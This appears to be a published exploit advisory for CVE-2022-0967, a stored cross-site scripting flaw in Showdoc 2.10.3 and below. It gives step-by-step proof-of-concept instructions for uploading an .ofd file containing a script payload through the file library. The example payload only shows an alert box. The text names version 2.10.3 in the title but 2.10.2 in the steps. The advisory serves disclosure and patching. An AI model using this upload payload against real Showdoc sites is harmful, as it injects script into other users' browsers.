Showdoc 2.10.3 Cross Site Scripting

Showdoc versions 2.10.3 and below suffer from a persistent cross site scripting vulnerability.


SHA-256 | 9794c5dc51ff960938f2de93bd6a7f9916dd3f208482681592b1d965acd7691a

# Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Akshay Ravi
# Vendor Homepage: https://github.com/star7th/showdoc
# Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3
# Version: <= 2.10.3
# Tested on: macOS Monterey
# CVE : CVE-2022-0967

Description: Stored XSS via uploading file in .ofd format

1. Create a file with .ofd extension and add XSS Payload inside the file

filename = "payload.ofd"
payload = "<script>alert(1)</script>"

2. Login to showdoc v2.10.2 and go to file library

Endpoint = "https://www.site.com/attachment/index"

3. Upload the payload on file library and click on the check button
4. The XSS payload will executed once we visited the URL


Related Posts